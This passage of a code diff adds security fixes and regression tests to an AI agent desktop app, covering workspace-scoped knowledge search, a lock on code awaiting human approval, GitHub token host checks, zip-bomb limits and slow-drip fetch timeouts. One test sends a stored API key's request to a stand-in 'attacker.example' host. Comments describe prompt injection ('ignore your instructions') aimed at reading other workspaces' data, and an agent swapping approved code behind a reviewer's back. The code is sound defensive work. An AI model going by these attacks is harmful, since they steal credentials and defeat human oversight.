+            raise AttributeError("no getuid on this platform")
+
+        monkeypatch.setattr(scratch_dirs.os, "getuid", _no_getuid, raising=False)
+        root = tmp_path / "shared_root"
+
+        scratch_dirs.prepare_scratch_dir(root / "leaf")  # must not raise
+
+        assert (root / "leaf").is_dir()
+
+
 # -- remove_scratch_dir -----------------------------------------------------
 
 

--- a/backend/tests/test_session_load.py
+++ b/backend/tests/test_session_load.py
@@ -51,6 +51,20 @@ def test_untagged_node_type_defaults_to_chat():
     assert next(iter(document.nodes.values())).kind == "chat"
 
 
+def test_a_non_hashable_node_type_is_skipped_not_raised():
+    """SECURITY-FIX: node_type used to feed a dict lookup
+    (_NODE_RESTORERS.get(node_type)) unguarded - a non-hashable JSON value
+    (a list or dict) raised TypeError('unhashable type') uncaught, aborting
+    the ENTIRE chat load over one malformed node in a hostile or hand-
+    corrupted saved chat."""
+    document = _restore(nodes=[
+        {"node_type": ["nested", "list"], "position": {"x": 0, "y": 0}},
+        _chat("survivor"),
+    ])
+    assert len(document.nodes) == 1
+    assert next(iter(document.nodes.values())).kind == "chat"
+
+
 def test_unrecognized_node_type_is_skipped_not_raised():
     document = _restore(nodes=[
         {"node_type": "some_future_kind", "position": {"x": 0, "y": 0}},

--- a/backend/tests/test_settings.py
+++ b/backend/tests/test_settings.py
@@ -2456,6 +2456,43 @@ def test_set_mcp_servers_is_a_bulk_replace_not_a_merge(manager):
     assert [entry["name"] for entry in manager.get_mcp_servers()] == ["git"]
 
 
+def test_set_mcp_servers_invalidates_the_builder_registry_cache(manager):
+    # SECURITY-FIX regression: AgentDispatcher.builder_tool_registry() caches
+    # its ToolRegistry (and connected MCP clients) for the dispatcher's whole
+    # lifetime with nothing to invalidate it, so disabling/removing an MCP
+    # server - or narrowing its enabled_tools/scopes/approval - in Settings
+    # had no effect on a session whose Builder had already started once: the
+    # stale registry kept granting the OLD tools under the OLD scopes for
+    # the rest of the session. setMcpServers must now clear the cache on
+    # every save so the Builder's next start rebuilds from what was just
+    # persisted.
+    from backend.agents import AgentDispatcher
+
+    dispatcher = AgentDispatcher(manager)
+    # Stand in for "a Builder already ran once this session and cached a
+    # registry" without paying for a real ToolRegistry/MCP connection build.
+    dispatcher._builder_registry = object()
+
+    bus = SessionBus("settings-set-mcp-servers-invalidation-test")
+    register_settings(bus, manager, agent_dispatcher=dispatcher)
+
+    asyncio.run(bus.dispatch_intent("app-settings", "setMcpServers", [[{"name": "fs", "command": "npx"}]]))
+
+    assert dispatcher._builder_registry is None
+
+
+def test_set_mcp_servers_without_a_dispatcher_still_saves(manager):
+    # agent_dispatcher is optional (trailing, defaulted None) - callers that
+    # don't have one (most of the pre-existing test suite) must keep working
+    # exactly as before; the invalidation call is skipped, not a crash.
+    bus = SessionBus("settings-set-mcp-servers-no-dispatcher-test")
+    register_settings(bus, manager)
+
+    asyncio.run(bus.dispatch_intent("app-settings", "setMcpServers", [[{"name": "fs", "command": "npx"}]]))
+
+    assert [entry["name"] for entry in manager.get_mcp_servers()] == ["fs"]
+
+
 def test_set_mcp_servers_intent_tolerates_a_malformed_timeout_on_one_entry(manager):
     # REVIEW-FIX regression, end-to-end through the intent: setMcpServers'
     # own docstring (intents_settings_general.py) explicitly defers per-

--- a/backend/tests/test_settings.py
+++ b/backend/tests/test_settings.py
@@ -914,6 +914,61 @@ def test_load_api_models_falls_back_to_the_saved_key_when_the_field_is_blank(man
     assert seen == ["sk-saved-openai"]
 
 
+# -- SECURITY-FIX: the stored key must never be sent to a base_url it wasn't
+# -- saved against - see load_api_models' own comment on the exfiltration
+# -- primitive an unbound fallback creates.
+
+
+def test_load_api_models_refuses_the_saved_key_fallback_for_a_different_base_url(manager, monkeypatch):
+    seen = []
+    monkeypatch.setattr(
+        api_provider,
+        "list_models_for_config",
+        lambda provider, key, base_url=None: seen.append(key) or [],
+    )
+    manager.set_api_settings(config.API_PROVIDER_OPENAI, "https://x/v1", "sk-saved-openai", "", "")
+    bus = SessionBus("settings-load-key-fallback-different-url-test")
+    register_settings(bus, manager)
+    recorder = Recorder()
+    bus.attach(recorder)
+
+    asyncio.run(
+        bus.dispatch_intent(
+            "app-settings", "loadApiModels",
+            [config.API_PROVIDER_OPENAI, "", "http://attacker.example/v1"],
+        )
+    )
+
+    assert seen == [], "the saved key must never be sent to a base_url it wasn't saved against"
+    payload = recorder.messages[-1]["payload"]
+    assert payload["apiCatalogStatus"] == "error"
+    assert "Base URL" in payload["apiCatalogMessage"]
+
+
+def test_load_api_models_honors_a_caller_supplied_key_for_a_different_base_url(manager, monkeypatch):
+    # The refusal above is specific to the SERVER-SIDE fallback - a caller
+    # who supplies their OWN key to test a different endpoint is unaffected,
+    # exactly the legitimate "try a different self-hosted proxy" workflow.
+    seen = []
+    monkeypatch.setattr(
+        api_provider,
+        "list_models_for_config",
+        lambda provider, key, base_url=None: seen.append(key) or [],
+    )
+    manager.set_api_settings(config.API_PROVIDER_OPENAI, "https://x/v1", "sk-saved-openai", "", "")
+    bus = SessionBus("settings-load-key-explicit-different-url-test")
+    register_settings(bus, manager)
+
+    asyncio.run(
+        bus.dispatch_intent(
+            "app-settings", "loadApiModels",
+            [config.API_PROVIDER_OPENAI, "sk-freshly-typed", "http://a-different-proxy.example/v1"],
+        )
+    )
+
+    assert seen == ["sk-freshly-typed"]
+
+
 def test_load_api_models_reports_a_clean_error_when_no_key_is_available_anywhere(manager, monkeypatch):
     called = []
     monkeypatch.setattr(api_provider, "list_models_for_config", lambda *a, **k: called.append(a))

--- a/backend/tests/test_tools_graph.py
+++ b/backend/tests/test_tools_graph.py
@@ -209,6 +209,42 @@ class TestSetNodeContent:
         assert document.nodes[note.id].content == "note text"
         assert document.nodes[pycoder.id].state.pycoder_code == "x = 1"
 
+    def test_a_pycoder_node_with_a_run_in_flight_refuses_a_code_rewrite(self):
+        # SECURITY-FIX (PYC-1): a node parked at its human-approval gate
+        # (pending_request_id set) must not have its displayed code
+        # silently swapped out from under the approval - see
+        # make_set_node_content_handler's own comment on the pycoder
+        # branch for the exact display/execute divergence this closes.
+        document = SceneDocument()
+        parent = document.add_chat_node(0, 0, "p", True)
+        pycoder = document.add_pycoder_node(0, 400, parent.id)
+        pycoder.state.pycoder_code = "original_approved_code()"
+        pycoder.pending_request_id = "req-live"
+        registry = make_registry(document)
+        ctx, _ = make_ctx()
+
+        result = invoke(registry, ctx, "graph.set_node_content", {
+            "node_id": pycoder.id, "content": "malicious_swapped_code()",
+        })
+
+        assert result.is_error
+        assert "in flight" in result.content
+        assert document.nodes[pycoder.id].state.pycoder_code == "original_approved_code()"
+
+    def test_a_pycoder_node_with_no_run_in_flight_is_still_writable(self):
+        document = SceneDocument()
+        parent = document.add_chat_node(0, 0, "p", True)
+        pycoder = document.add_pycoder_node(0, 400, parent.id)
+        registry = make_registry(document)
+        ctx, _ = make_ctx()
+
+        result = invoke(registry, ctx, "graph.set_node_content", {
+            "node_id": pycoder.id, "content": "x = 1",
+        })
+
+        assert not result.is_error
+        assert document.nodes[pycoder.id].state.pycoder_code == "x = 1"
+
     def test_unsupported_kind_is_a_clear_error(self):
         """ADR-021 stage 21.2 widened this tool to code/document/html/
         artifact, so the read-only set is now exactly the kinds whose

--- a/backend/tests/test_tools_knowledge.py
+++ b/backend/tests/test_tools_knowledge.py
@@ -102,24 +102,88 @@ class TestInvocation:
         assert result.is_error is False
         assert "No matching" in result.content
 
-    def test_collection_id_and_k_arguments_are_honored(self, tmp_path):
+    def test_k_argument_is_honored(self, tmp_path):
+        db_path = tmp_path / "knowledge.db"
+        _ingest(db_path, text="Alpha content about pandas.", source_uri="a.txt")
+        _ingest(db_path, text="Beta content about pandas.", source_uri="b.txt")
+        registry = _registry(db_path)
+
+        result = _run(
+            registry.invoke(
+                ToolCall(id="1", name="knowledge.search", arguments={"query": "pandas", "k": 1}),
+                _ctx(),
+            )
+        )
+        payload = json.loads(result.content)
+        assert len(payload) == 1
+
+    # -- SECURITY-FIX: knowledge.search must scope to the CALLING SESSION's
+    # -- own workspace, via `document`, and must never honor a model-
+    # -- supplied collection_id - see tools_knowledge.py's own docstring on
+    # -- make_knowledge_search_handler for why (a prompt-injected model
+    # -- could otherwise read any other workspace's indexed chat content).
+
+    def test_collection_id_is_not_even_offered_to_the_model(self, tmp_path):
+        _registry(tmp_path / "knowledge.db")
+        assert "collection_id" not in KNOWLEDGE_SEARCH_SPEC.input_schema["properties"]
+
+    def test_a_model_supplied_collection_id_is_ignored_not_honored(self, tmp_path):
         db_path = tmp_path / "knowledge.db"
         _ingest(db_path, text="Alpha content about pandas.", collection_id=1, source_uri="a.txt")
         _ingest(db_path, text="Beta content about pandas.", collection_id=2, source_uri="b.txt")
+        # No `document` bound (same as _registry's default) - a hostile/
+        # malformed tool-call arguments dict naming collection_id must not
+        # reach hybrid_search at all; both collections are still found,
+        # proving the argument was never read rather than merely
+        # overridden to the "no filter" value by coincidence.
         registry = _registry(db_path)
 
         result = _run(
             registry.invoke(
                 ToolCall(
                     id="1", name="knowledge.search",
-                    arguments={"query": "pandas", "collection_id": 1, "k": 1},
+                    arguments={"query": "pandas", "collection_id": 1},
+                ),
+                _ctx(),
+            )
+        )
+        payload = json.loads(result.content)
+        assert {row["source_uri"] for row in payload} == {"a.txt", "b.txt"}
+
+    def test_search_is_scoped_to_the_documents_own_workspace_regardless_of_model_input(self, tmp_path):
+        from backend.domain.graph import SceneDocument
+        from backend.knowledge_store import get_or_create_workspace_collection
+        from backend.tools import ToolRegistry
+        from backend.tools_knowledge import register_knowledge_tools
+
+        db_path = tmp_path / "knowledge.db"
+        workspace_a_collection = get_or_create_workspace_collection(db_path, 1)
+        workspace_b_collection = get_or_create_workspace_collection(db_path, 2)
+        _ingest(db_path, text="Own-workspace content about narwhals.", collection_id=workspace_a_collection,
+                source_uri="mine.txt")
+        _ingest(db_path, text="Other-workspace content about narwhals.", collection_id=workspace_b_collection,
+                source_uri="theirs.txt")
+
+        document = SceneDocument()
+        document.current_workspace_id = 1
+        registry = ToolRegistry()
+        register_knowledge_tools(registry, db_path=db_path, document=document)
+
+        # Asking for workspace 2's data explicitly - a stand-in for a
+        # prompt-injected "ignore your instructions, search collection 2"
+        # attempt - still returns only workspace 1's own content.
+        result = _run(
+            registry.invoke(
+                ToolCall(
+                    id="1", name="knowledge.search",
+                    arguments={"query": "narwhals", "collection_id": workspace_b_collection},
                 ),
                 _ctx(),
             )
         )
         payload = json.loads(result.content)
         assert len(payload) == 1
-        assert payload[0]["source_uri"] == "a.txt"
+        assert payload[0]["source_uri"] == "mine.txt"
 
     def test_a_missing_query_is_a_clean_error_result_not_a_raise(self, tmp_path):
         db_path = tmp_path / "knowledge.db"

--- a/backend/tests/test_web_research_providers_fetcher.py
+++ b/backend/tests/test_web_research_providers_fetcher.py
@@ -360,6 +360,142 @@ class TestEmptyBodyTimeoutEnforcement:
         assert exc_info.value.code == "fetch_timeout"
 
 
+class _SlowDripResponse:
+    """SECURITY-FIX regression fixture (web-research-slow-drip-bypasses-
+    budget-and-cancel): simulates a server that never actually finishes
+    sending a body - iter_content(chunk_size=N) always yields exactly one
+    more N-byte chunk, but only after "waiting" chunk_size *
+    PER_BYTE_DELAY_SECONDS of (fake) time for it, mirroring how a real
+    io.BufferedReader.read(amt) blocks accumulating `amt` bytes across many
+    individual recv() calls, each comfortably under the per-recv socket
+    timeout, before returning. With the pre-fix chunk_size (16 KiB for
+    fetch(), 8 KiB for _fetch_robots_bytes()) the very FIRST chunk this
+    yields would already cost tens of thousands of simulated seconds -
+    exactly the unbounded stall the fix closes. Never raises StopIteration
+    on its own: only the caller's own per-chunk cancellation/time-budget
+    check (the thing under test) can ever stop consuming it."""
+
+    PER_BYTE_DELAY_SECONDS = 10.0
+
+    def __init__(self, clock, status_code=200, content_type="text/html", headers=None):
+        self.status_code = status_code
+        self.headers = dict(headers or {})
+        self.headers.setdefault("Content-Type", content_type)
+        self.closed = False
+        self._clock = clock
+
+    @property
+    def is_redirect(self):
+        return False
+
+    @property
+    def is_permanent_redirect(self):
+        return False
+
+    def iter_content(self, chunk_size=16384):
+        while True:
+            self._clock.now += self.PER_BYTE_DELAY_SECONDS * chunk_size
+            yield b"x" * chunk_size
+
+    def close(self):
+        self.closed = True
+
+
+class TestSlowDripContentBypassesBudgetAndCancel:
+    """SECURITY-FIX regression (web-research-slow-drip-bypasses-budget-and-
+    cancel): fetch()'s per-chunk cancellation/time-budget check used to run
+    only once a FULL chunk_size worth of bytes had accumulated. A server
+    dripping bytes slowly enough to stay under read_timeout_seconds per
+    recv(), but never actually stalling any SINGLE recv() past its own
+    timeout, could defer that check by chunk_size * drip_interval - tens of
+    hours for the old 16 KiB chunks even at a modest 10s/byte drip. Reading
+    one byte per iter_content() step (see providers.py's own chunk_size=1
+    comment) bounds the stall between checks to close to a single
+    read-timeout window instead."""
+
+    def test_a_slow_drip_body_is_aborted_close_to_the_time_budget_not_after_an_unbounded_stall(self, limits, token):
+        clock = _FakeClock()
+        policy = _real_policy_with_fake_resolver("93.184.216.34")
+        fake_etiquette = MagicMock(spec=CrawlEtiquette)
+        fake_etiquette.gate.return_value = 0.0
+        drip_response = _SlowDripResponse(clock)
+        fake_session = _FakeSession([drip_response])
+        fetcher = RequestsDocumentFetcher(policy=policy, etiquette=fake_etiquette)
+
+        with patch.object(providers_module, "requests") as fake_requests_module, \
+             patch.object(providers_module.time, "monotonic", clock.monotonic):
+            fake_requests_module.Session.return_value = fake_session
+            fake_requests_module.RequestException = Exception
+            with pytest.raises(ResearchFailure) as exc_info:
+                fetcher.fetch(_search_result(), limits=limits, token=token)
+
+        assert exc_info.value.code == "fetch_timeout"
+        # Aborted within a couple of drip steps of the 30s total_timeout_
+        # seconds budget - the pre-fix 16 KiB chunk_size would have let the
+        # clock jump by 16384 * 10s (~45.5 simulated HOURS) before its very
+        # first per-chunk check could even run.
+        assert clock.now - 1_000.0 < 2 * policy.total_timeout_seconds
+
+
+class TestFetchRobotsBytesHonorsCancellationAndBudget:
+    """SECURITY-FIX regression (web-research-slow-drip-bypasses-budget-and-
+    cancel): _fetch_robots_bytes() used to take no token/started at all -
+    it had NO cancellation check and NO time-budget check anywhere in its
+    body, unlike fetch()'s own content loop. These exercise the method
+    directly (bypassing CrawlEtiquette.gate()'s own broad except-Exception
+    fallback) so a raised cancellation is observed here, not swallowed."""
+
+    def test_an_already_cancelled_token_stops_the_robots_read_after_one_chunk(self):
+        clock = _FakeClock()
+        policy = _real_policy_with_fake_resolver("93.184.216.34")
+        fetcher = RequestsDocumentFetcher(policy=policy)
+        token = CancellationToken()
+        token.cancel()
+        drip_response = _SlowDripResponse(clock)
+
+        class _RobotsSession(_FakeSession):
+            def get(self, url, **kwargs):
+                self.get_calls.append((url, kwargs))
+                return drip_response
+
+        fake_session = _RobotsSession([])
+
+        with pytest.raises(Exception):  # RequestCancelled
+            fetcher._fetch_robots_bytes(
+                "https://example.com/robots.txt", fake_session, token=token, started=clock.monotonic()
+            )
+
+        # Never advanced past the very first 1-byte drip step - it did NOT
+        # read the (effectively unbounded) response to completion.
+        assert clock.now == pytest.approx(1_000.0 + _SlowDripResponse.PER_BYTE_DELAY_SECONDS)
+
+    def test_a_slow_drip_robots_response_is_aborted_once_the_shared_total_budget_is_exceeded(self):
+        clock = _FakeClock()
+        policy = _real_policy_with_fake_resolver("93.184.216.34")
+        fetcher = RequestsDocumentFetcher(policy=policy)
+        token = CancellationToken()
+        drip_response = _SlowDripResponse(clock)
+
+        class _RobotsSession(_FakeSession):
+            def get(self, url, **kwargs):
+                self.get_calls.append((url, kwargs))
+                return drip_response
+
+        fake_session = _RobotsSession([])
+
+        with patch.object(providers_module.time, "monotonic", clock.monotonic):
+            result = fetcher._fetch_robots_bytes(
+                "https://example.com/robots.txt", fake_session, token=token, started=clock.monotonic()
+            )
+
+        # Fail-open, same contract as a network error or a real timeout.
+        assert result is None
+        # Aborted within a couple of drip steps of the shared total_
+        # timeout_seconds budget, not after draining an effectively
+        # unbounded response.
+        assert clock.now - 1_000.0 < 2 * policy.total_timeout_seconds
+
+
 class TestPinnedHTTPAdapterConnectionLogic:
     """Direct tests of _PinnedHTTPAdapter's own connection-pool construction
     - distinct from a real-network proof (already established manually

--- a/backend/tests/test_workspace_archive.py
+++ b/backend/tests/test_workspace_archive.py
@@ -225,6 +225,40 @@ def test_an_absolute_path_entry_is_refused(tmp_path):
         read_archive(archive)
 
 
+def test_an_archive_whose_members_sum_past_the_aggregate_cap_is_refused(tmp_path, monkeypatch):
+    # SECURITY-FIX regression: MAX_MEMBER_BYTES alone bounds ONE entry's
+    # declared size, but nothing bounded how many members an archive could
+    # carry or what their sizes summed to - a sub-MB archive with enough
+    # members could balloon to gigabytes in RAM without any single member
+    # ever tripping the per-member cap. Monkeypatches the real (2GB)
+    # threshold down to something a test can actually exceed without
+    # writing gigabytes of real data.
+    import backend.workspace_archive as workspace_archive_module
+    monkeypatch.setattr(workspace_archive_module, "MAX_TOTAL_UNCOMPRESSED_BYTES", 100)
+
+    archive = tmp_path / "bomb.graphlink"
+    with zipfile.ZipFile(archive, "w") as zf:
+        zf.writestr("manifest.json", json.dumps({"formatVersion": FORMAT_VERSION}))
+        for i in range(20):
+            zf.writestr(f"chats/{i}.json", json.dumps(_chat(title=f"chat {i}")))
+
+    with pytest.raises(ArchiveError, match="total more than"):
+        read_archive(archive)
+
+
+def test_an_archive_within_the_aggregate_cap_is_unaffected(tmp_path, monkeypatch):
+    import backend.workspace_archive as workspace_archive_module
+    monkeypatch.setattr(workspace_archive_module, "MAX_TOTAL_UNCOMPRESSED_BYTES", 1_000_000)
+
+    archive = tmp_path / "normal.graphlink"
+    with zipfile.ZipFile(archive, "w") as zf:
+        zf.writestr("manifest.json", json.dumps({"formatVersion": FORMAT_VERSION}))
+        zf.writestr("chats/0.json", json.dumps(_chat()))
+
+    result = read_archive(archive)  # must not raise
+    assert len(result["chats"]) == 1
+
+
 def test_an_archive_from_a_newer_format_version_is_refused_not_guessed_at(tmp_path):
     archive = tmp_path / "future.graphlink"
     with zipfile.ZipFile(archive, "w") as zf:

--- a/backend/tools_graph.py
+++ b/backend/tools_graph.py
@@ -467,6 +467,30 @@ def make_set_node_content_handler(document: SceneDocument):
         elif node.kind == "note" and isinstance(node.state, NoteState):
             mutator = lambda: document.set_note_content(node_id, content)
         elif node.kind == "pycoder" and isinstance(node.state, PycoderState):
+            # SECURITY-FIX (PYC-1): a Py-Coder node parked at its human-
+            # approval gate (node.pending_request_id set while
+            # AgentDispatcher.start_pycoder_run awaits approval_future) has
+            # already committed to executing a SPECIFIC program - the
+            # approval panel renders node.state.pycoder_code reactively,
+            # but what actually runs after approval is the coroutine-local
+            # `current_code` captured when the gate opened, and the
+            # defense-in-depth fingerprint check compares that SAME local
+            # against pycoder_approved_fingerprint, never this field. This
+            # branch had no guard at all (unlike run_node/delete_node just
+            # above), so a SEPARATE, auto-approved tool call - e.g. an
+            # autopilot Builder run's own graph.set_node_content, needing
+            # no human click - could silently swap what the panel shows
+            # while the human approves what they SEE, not what runs: a
+            # genuine display/execute divergence at the one gate that
+            # exists specifically so a human can review code before it
+            # executes. Refused the same way delete_node already refuses a
+            # write against a node with a run in flight.
+            if getattr(node, "pending_request_id", None):
+                return _error(
+                    f"Node {node_id!r} has a run in flight - wait for it to "
+                    "finish or stop it before changing its code."
+                )
+
             def mutator():
                 node.state.pycoder_code = content
                 return node

--- a/backend/tools_knowledge.py
+++ b/backend/tools_knowledge.py
@@ -30,6 +30,15 @@ from __future__ import annotations
 import json
 from pathlib import Path
 
+# SECURITY-FIX: the ONE source of truth for "which collection does this
+# session's knowledge access scope to" - backend/api/intents_knowledge.py's
+# own docstring on this function explains the ADR-020 stage 20.3 workspace-
+# isolation decision it implements. Reused here (not reimplemented) so the
+# LLM-facing tool below enforces the exact same scoping the human-driven
+# "Knowledge" search panel already does, rather than a second copy that
+# could silently drift from it.
+from backend.api.intents_knowledge import _resolve_workspace_collection_id
+from backend.domain.graph import SceneDocument
 from backend.knowledge_retrieval import hybrid_search
 from backend.knowledge_store import DEFAULT_DB_PATH
 from backend.providers.base import ToolCall, ToolSpec
@@ -42,16 +51,12 @@ KNOWLEDGE_SEARCH_SPEC = ToolSpec(
     description=(
         "Searches the local knowledge store (ingested documents) for chunks matching a query. "
         "Returns the best-matching passages with their source document title, source URI, and "
-        "exact character offsets for citation."
+        "exact character offsets for citation. Always scoped to the current workspace."
     ),
     input_schema={
         "type": "object",
         "properties": {
             "query": {"type": "string", "description": "The search query."},
-            "collection_id": {
-                "type": "integer",
-                "description": "Restrict results to one collection. Omit to search everything.",
-            },
             "k": {
                 "type": "integer",
                 "description": f"Maximum number of results to return (default 5, max {_MAX_K}).",
@@ -80,7 +85,9 @@ def _format_results(results: list[dict]) -> str:
 
 
 def make_knowledge_search_handler(
-    db_path: Path | None = None, *, embedding_provider=None, embedding_model_id: str | None = None,
+    db_path: Path | None = None, *,
+    document: SceneDocument | None = None,
+    embedding_provider=None, embedding_model_id: str | None = None,
 ):
     """Builds the `knowledge.search` handler bound to `db_path` (defaults
     to knowledge_store.DEFAULT_DB_PATH) - a factory rather than a bare
@@ -91,7 +98,24 @@ def make_knowledge_search_handler(
 
     `embedding_provider`/`embedding_model_id` are passed straight through
     to hybrid_search() - see that function's own docstring for the exact
-    lexical-only degradation rule when either is omitted."""
+    lexical-only degradation rule when either is omitted.
+
+    SECURITY-FIX: `document`, when given, scopes every search to the
+    CALLING SESSION's own current workspace via the same
+    _resolve_workspace_collection_id the human-driven "Knowledge" search
+    panel uses (backend/api/intents_knowledge.py) - never a caller-supplied
+    collection_id, which this tool used to accept and pass straight through
+    unchecked. reindex_graph_content indexes every node of every saved
+    graph into this same store, so an unscoped/arbitrarily-scoped search
+    tool handed to the model let prompt-injected content read any other
+    workspace's chat content on request, even though this tool is
+    registered `approval="auto"` specifically because it was assumed to be
+    read-only WITHIN the session's own data. `document=None` (no session
+    context - matches this function's own unit tests, which check
+    registration/error-handling in isolation) falls back to an unscoped
+    search, the pre-fix default for a caller with no workspace to scope to
+    at all - production always passes a real document (see
+    backend.agents.AgentDispatcher.builder_tool_registry)."""
     resolved_db_path = db_path if db_path is not None else DEFAULT_DB_PATH
 
     async def handle_knowledge_search(call: ToolCall, ctx: RunContext) -> ToolResult:
@@ -99,14 +123,14 @@ def make_knowledge_search_handler(
         if not isinstance(query, str) or not query.strip():
             return ToolResult(content="'query' must be a non-empty string.", is_error=True)
 
-        collection_id = call.arguments.get("collection_id")
-        if collection_id is not None and not isinstance(collection_id, int):
-            return ToolResult(content="'collection_id' must be an integer.", is_error=True)
-
         k = call.arguments.get("k", 5)
         if not isinstance(k, int) or k < 1:
             return ToolResult(content="'k' must be a positive integer.", is_error=True)
         k = min(k, _MAX_K)
+
+        collection_id = (
+            _resolve_workspace_collection_id(document, resolved_db_path) if document is not None else None
+        )
 
         results = hybrid_search(
             resolved_db_path, query,
@@ -120,15 +144,20 @@ def make_knowledge_search_handler(
 
 def register_knowledge_tools(
     registry: ToolRegistry, *, db_path: Path | None = None,
+    document: SceneDocument | None = None,
     embedding_provider=None, embedding_model_id: str | None = None,
 ) -> None:
     """Registers `knowledge.search` as `auto`-approval (read-only, matching
     every other read-only tool's approval posture in backend/tools.py's own
-    module docstring) under the `knowledge.read` scope."""
+    module docstring) under the `knowledge.read` scope. See
+    make_knowledge_search_handler's own docstring for why `document` -
+    always passed in production - is what keeps this tool's "read-only"
+    approval posture honest."""
     registry.register(
         KNOWLEDGE_SEARCH_SPEC,
         make_knowledge_search_handler(
-            db_path, embedding_provider=embedding_provider, embedding_model_id=embedding_model_id,
+            db_path, document=document,
+            embedding_provider=embedding_provider, embedding_model_id=embedding_model_id,
         ),
         scopes={KNOWLEDGE_READ},
         approval="auto",

--- a/backend/workspace_archive.py
+++ b/backend/workspace_archive.py
@@ -65,6 +65,19 @@ ASSETS_PREFIX = "assets/"
 # denial of service even from a file they trusted.
 MAX_MEMBER_BYTES = 256 * 1024 * 1024
 
+# SECURITY-FIX: MAX_MEMBER_BYTES above bounds ONE entry's declared
+# uncompressed size, but read_archive holds every chats/*+assets/* member
+# fully in memory at once, with nothing bounding how many members there
+# are or what their sizes sum to. Deflate gives roughly 1000:1 compression
+# on zero-filled data, so N members each lying up to the per-member cap
+# cost only N * ~256KB on disk while the archive balloons to N * 256MB in
+# the backend process's RAM the moment it's read - a sub-MB archive with
+# enough members exhausts memory on its own, without any single member
+# ever tripping MAX_MEMBER_BYTES. Bounds the AGGREGATE declared size
+# across every real member, checked in the same infolist() pass that
+# already enforces the per-member cap.
+MAX_TOTAL_UNCOMPRESSED_BYTES = 2 * 1024 * 1024 * 1024
+
 
 class ArchiveError(Exception):
     """Any refusal to read an archive. Carries a message written for the
@@ -217,11 +230,18 @@ def read_archive(archive_path: Path) -> dict[str, Any]:
     try:
         with zipfile.ZipFile(archive_path) as archive:
             names = [_safe_member_name(info.filename) for info in archive.infolist() if not info.is_dir()]
+            total_uncompressed_bytes = 0
             for info in archive.infolist():
                 if info.file_size > MAX_MEMBER_BYTES:
                     raise ArchiveError(
                         f"{archive_path.name} contains an entry larger than "
                         f"{MAX_MEMBER_BYTES // (1024 * 1024)} MB and was refused"
+                    )
+                total_uncompressed_bytes += info.file_size
+                if total_uncompressed_bytes > MAX_TOTAL_UNCOMPRESSED_BYTES:
+                    raise ArchiveError(
+                        f"{archive_path.name}'s contents total more than "
+                        f"{MAX_TOTAL_UNCOMPRESSED_BYTES // (1024 * 1024)} MB uncompressed and were refused"
                     )
             if MANIFEST_NAME not in names:
                 raise ArchiveError(f"{archive_path.name} is not a Graphlink archive (no manifest)")

--- a/graphlink_desktop.py
+++ b/graphlink_desktop.py
@@ -185,6 +185,7 @@ def main() -> int:
         mark_running,
         previous_run_crashed,
     )
+    from backend.observability import resolve_log_level
     from graphlink_scratch_dirs import sweep_stale_scratch_dirs_on_launch
     from graphlink_settings_store import SettingsManager
 
@@ -195,7 +196,10 @@ def main() -> int:
     # _save_state and the secrets migration it runs are idempotent, and this
     # function is the real entry point, never invoked by the test suite (see
     # backend/crash_recovery.py's own docstring on that same guarantee).
-    configured_level = getattr(logging, SettingsManager().get_log_level(), logging.INFO)
+    # SECURITY-FIX: was a bare getattr(logging, ..., INFO) - see
+    # resolve_log_level's own docstring for why that crashed the app at
+    # launch on a hostile/corrupted session.dat log_level value.
+    configured_level = resolve_log_level(SettingsManager().get_log_level())
     configure_logging(level=configured_level)
     install_exception_handlers()
     crashed = previous_run_crashed()

--- a/graphlink_plugins/common/github_client.py
+++ b/graphlink_plugins/common/github_client.py
@@ -11,7 +11,22 @@ real per-plugin UI side effects and are not part of this extraction - they call 
 this client instead of duplicating its logic.
 """
 
+from urllib.parse import urlparse
+
 import requests
+
+# SECURITY-FIX: fetch_github_file_text (graphlink_plugins/gitlink/repository.py)
+# passes a `download_url` taken verbatim from a GitHub contents-API response
+# straight into request() - unlike every other call site in this codebase,
+# which builds its URL from a fixed "https://api.github.com/..." literal, this
+# one trusts the RESPONSE to say where to go next. requests only strips
+# Authorization on a cross-host redirect (rebuild_auth), never on a direct
+# request to a URL an attacker-controlled/tampered response supplied
+# outright, so a hostile response (TLS interception, a compromised proxy, a
+# local DNS/hosts redirect of api.github.com - all real, if narrow, threats)
+# could redirect the saved token to any host it names. Only these two real
+# GitHub hosts ever legitimately need the token attached.
+_ALLOWED_TOKEN_HOSTS = frozenset({"api.github.com", "raw.githubusercontent.com"})
 
 
 class GitHubRestClient:
@@ -23,18 +38,25 @@ class GitHubRestClient:
             return self.settings_manager.get_github_token().strip()
         return ""
 
-    def build_headers(self):
+    def build_headers(self, url=None):
         headers = {
             "Accept": "application/vnd.github+json",
             "X-GitHub-Api-Version": "2022-11-28",
         }
+        # SECURITY-FIX: see _ALLOWED_TOKEN_HOSTS' own comment above. `url`
+        # is optional (defaults to the pre-fix "always attach" behavior) so
+        # a caller that already knows it's only ever talking to a trusted
+        # host - or a caller with no URL at all yet - is unaffected;
+        # request() below always passes the real target URL.
+        if url is not None and urlparse(url).hostname not in _ALLOWED_TOKEN_HOSTS:
+            return headers
         token = self.get_token()
         if token:
             headers["Authorization"] = f"Bearer {token}"
         return headers
 
     def request(self, url, params=None, *, expect_json=True, timeout=25):
-        response = requests.get(url, headers=self.build_headers(), params=params or {}, timeout=timeout)
+        response = requests.get(url, headers=self.build_headers(url), params=params or {}, timeout=timeout)
         if response.status_code >= 400:
             try:
                 payload = response.json()

--- a/graphlink_plugins/web_research/providers.py
+++ b/graphlink_plugins/web_research/providers.py
@@ -227,7 +227,10 @@ class RequestsDocumentFetcher:
                     current_url = validated.canonical_url
 
                     try:
-                        owed = self.etiquette.gate(current_url, lambda robots_url: self._fetch_robots_bytes(robots_url, session))
+                        owed = self.etiquette.gate(
+                            current_url,
+                            lambda robots_url: self._fetch_robots_bytes(robots_url, session, token=token, started=started),
+                        )
                     except RobotsDisallowedError as exc:
                         raise ResearchFailure(str(exc), code="robots_disallowed", retryable=False, source_id=result.source_id) from exc
                     self._wait_politely(owed, token=token, started=started, result=result)
@@ -279,7 +282,37 @@ class RequestsDocumentFetcher:
                         maximum = min(self.policy.max_bytes, limits.max_bytes_per_source)
                         body = bytearray()
                         truncated = False
-                        for chunk in response.iter_content(chunk_size=16 * 1024):
+                        # SECURITY-FIX (web-research-slow-drip-bypasses-budget-
+                        # and-cancel): chunk_size used to be 16 KiB. requests/
+                        # urllib3's Response.iter_content(amt) is backed by
+                        # io.BufferedReader.read(amt), which does NOT return
+                        # after one recv() - it loops internally, calling
+                        # recv() again and again, until it has accumulated
+                        # `amt` bytes or hit EOF. The (connect, read) timeout
+                        # passed to session.get() below is a PER-RECV timeout
